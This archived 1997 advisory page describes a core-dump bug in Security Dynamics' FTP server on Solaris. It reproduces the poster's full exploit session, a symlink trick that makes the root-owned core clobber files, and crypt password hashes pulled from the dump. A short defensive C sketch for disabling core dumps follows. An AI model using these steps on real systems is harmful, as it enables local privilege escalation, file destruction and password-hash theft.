Security Dynamics FTP server core problem

Summary
Description: It is possible to cause this server to dump core while ftping in. The core file will clobber files and also contains crypt(3)ed passwords.
Author: sp00n <sp00n@COUPLER.300BAUD.COM>
Compromise: root (local)
Vulnerable Systems: Solaris 2.5 running Security Dynamics' FTP server (Version 2.2); perhaps other versions.
Date: 12 November 1997
Details


Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: best-of-security@cyber.com.au
Subject: BoS:      Bug In Security Dynamics' FTP server (Version 2.2)


Hi,

This bug is similar to the Solaris and other ftp core dump bugs, slightly
different though. BTW the machine is a SPARC 20 running 2.5. You can link
files and clobber them with a core to annoy your local sys admin or, even
better, get /etc/shadow, u get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it :(


Not too useful, you say? Welp, prior to dumping the core you should link it
to ps_data or something like that, then you will get this:

lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
-rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

$file ps_data
ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

$strings core | more

noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root


[ Junk cut --Fyodor ]
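
The listings above show a root-owned core written through a symlink and holding shadow entries. The following is an added hardening sketch, not part of the original post or the vendor's code: a daemon zeroes RLIMIT_CORE before it touches password data, and a helper classifies whatever sits at "core" in a directory without following links. The function names disable_core_dumps and core_entry_kind are hypothetical.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Zero the soft and hard core-size limits so a crash in this process, or in
 * any child it forks afterwards, writes no core file. Returns 0 on success. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Report what sits at <dir>/core without following links:
 * 0 = nothing, 1 = regular file, 2 = symlink, 3 = other, -1 = error. */
int core_entry_kind(const char *dir)
{
    char path[4096];
    struct stat st;
    int n = snprintf(path, sizeof path, "%s/core", dir);

    if (n < 0 || (size_t)n >= sizeof path)
        return -1;
    if (lstat(path, &st) != 0)
        return errno == ENOENT ? 0 : -1;
    if (S_ISLNK(st.st_mode))
        return 2;
    return S_ISREG(st.st_mode) ? 1 : 3;
}

int main(void)
{
    /* A daemon would call this at startup, before it reads any password data. */
    if (disable_core_dumps() != 0) {
        perror("setrlimit");
        return 1;
    }
    /* Constructed check: "/tmp" is only a sample directory to inspect. */
    printf("kind of /tmp/core: %d\n", core_entry_kind("/tmp"));
    return 0;
}
```

A result of 2 from core_entry_kind in a world-writable directory is the pre-planted link condition shown in the "core -> ps_data" listing.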

This page is part of Fyodor's exploit world.